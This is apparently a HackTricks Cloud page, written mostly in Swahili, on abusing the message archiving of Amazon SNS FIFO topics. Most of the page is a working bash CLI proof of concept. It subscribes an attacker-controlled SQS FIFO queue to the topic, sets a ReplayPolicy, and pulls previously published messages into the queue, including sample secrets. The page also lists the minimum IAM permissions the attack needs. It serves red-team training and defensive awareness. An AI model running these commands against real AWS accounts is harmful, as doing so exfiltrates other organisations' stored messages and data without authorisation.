SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Matumizi mabaya ya Amazon SNS FIFO topic message archiving ili kureplay na exfiltrate ujumbe zilizochapishwa awali kwenda kwenye attacker-controlled SQS FIFO queue kwa kuweka subscription ReplayPolicy.

Huduma: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
Mahitaji: Topic lazima iwe na ArchivePolicy imewezeshwa (message archiving). Attacker anaweza Subscribe kwenye topic na set attributes kwenye subscription yao. Attacker anasimamia SQS FIFO queue na anaruhusu topic kutuma ujumbe.
Athari: Ujumbe za kihistoria (published before the subscription) zinaweza kuwasilishwa kwa attacker endpoint. Replayed deliveries zinaletwa na alama Replayed=true katika envelope ya SNS.

Masharti ya awali

SNS FIFO topic yenye uhifadhi umewezeshwa: ArchivePolicy (mfano, { "MessageRetentionPeriod": "2" } kwa siku 2).
Mshambuliaji ana ruhusa za:
sns:Subscribe on the target topic.
sns:SetSubscriptionAttributes on the created subscription.
Mshambuliaji ana SQS FIFO queue na anaweza kuambatisha queue policy inayoruhusu sns:SendMessage kutoka kwa topic ARN.

Ruhusa za chini kabisa za IAM

Kwenye topic: sns:Subscribe.
Kwenye subscription: sns:SetSubscriptionAttributes.
Kwenye queue: sqs:SetQueueAttributes kwa policy, na queue policy inyoruhusu sns:SendMessage kutoka kwa topic ARN.

Shambulio: Replay archived messages to attacker SQS FIFO

Mshambuliaji anasubscribe SQS FIFO queue yao kwenye mhasiriwa SNS FIFO topic, kisha anaweka ReplayPolicy kwa timestamp ya zamani (ndani ya dirisha la archive retention). SNS mara moja ina-replay archived messages zinazofanana kwa subscription mpya na kuzipa alama Replayed=true.

Notes:

The timestamp used in ReplayPolicy must be >= the topic's BeginningArchiveTime. Ikiwa ni mapema zaidi, API itarudisha Invalid StartingPoint value.
Kwa SNS FIFO Publish, lazima utoe MessageGroupId (na ama dedup ID au wekesha ContentBasedDeduplication).

End-to-end CLI POC (us-east-1)

bash

REGION=us-east-1
# Compute a starting point; adjust later to >= BeginningArchiveTime if needed
TS_START=$(python3 - << 'PY'
from datetime import datetime, timezone, timedelta
print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ'))
PY
)

# 1) Create SNS FIFO topic with archiving (2-day retention)
TOPIC_NAME=htreplay$(date +%s).fifo
TOPIC_ARN=$(aws sns create-topic --region "$REGION" \
--cli-input-json '{"Name":"'"$TOPIC_NAME"'","Attributes":{"FifoTopic":"true","ContentBasedDeduplication":"true","ArchivePolicy":"{\"MessageRetentionPeriod\":\"2\"}"}}' \
--query TopicArn --output text)

echo "Topic: $TOPIC_ARN"

# 2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId)
for i in $(seq 1 3); do
aws sns publish --region "$REGION" --topic-arn "$TOPIC_ARN" \
--message "{\"orderId\":$i,\"secret\":\"ssn-123-45-678$i\"}" \
--message-group-id g1 >/dev/null
done

# 3) Create attacker SQS FIFO queue and allow only this topic to send
Q_URL=$(aws sqs create-queue --queue-name ht-replay-exfil-q-$(date +%s).fifo \
--attributes FifoQueue=true --region "$REGION" --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region "$REGION" \
--attribute-names QueueArn --query Attributes.QueueArn --output text)

cat > /tmp/ht-replay-sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$TOPIC_ARN"}}}]}
JSON
# Use CLI input JSON to avoid quoting issues
aws sqs set-queue-attributes --region "$REGION" --cli-input-json "$(python3 - << 'PY'
import json, os
print(json.dumps({
'QueueUrl': os.environ['Q_URL'],
'Attributes': {'Policy': open('/tmp/ht-replay-sqs-policy.json').read()}
}))
PY
)"

# 4) Subscribe the queue to the topic
SUB_ARN=$(aws sns subscribe --region "$REGION" --topic-arn "$TOPIC_ARN" \
--protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)

echo "Subscription: $SUB_ARN"

# 5) Ensure StartingPoint is >= BeginningArchiveTime
BEGIN=$(aws sns get-topic-attributes --region "$REGION" --topic-arn "$TOPIC_ARN" --query Attributes.BeginningArchiveTime --output text)
START=${TS_START}
if [ -n "$BEGIN" ]; then START="$BEGIN"; fi

aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$SUB_ARN" \
--attribute-name ReplayPolicy \
--attribute-value "{\"PointType\":\"Timestamp\",\"StartingPoint\":\"$START\"}"

# 6) Receive replayed messages (note Replayed=true in the SNS envelope)
aws sqs receive-message --queue-url "$Q_URL" --region "$REGION" \
--max-number-of-messages 10 --wait-time-seconds 10 \
--message-attribute-names All --attribute-names All

Impact

Athari Zinazowezekana: Mshambuliaji ambaye anaweza kujisajili kwenye SNS FIFO topic yenye archiving imewezeshwa na kuweka ReplayPolicy kwenye subscription yao anaweza mara moja kucheza tena na exfiltrate ujumbe wa kihistoria uliotumwa kwenye topic hiyo, si tu ujumbe uliotumwa baada subscription kuundwa. Ujumbe uliwasilishwa una jumuisha flag Replayed=true katika envelope ya SNS.

tip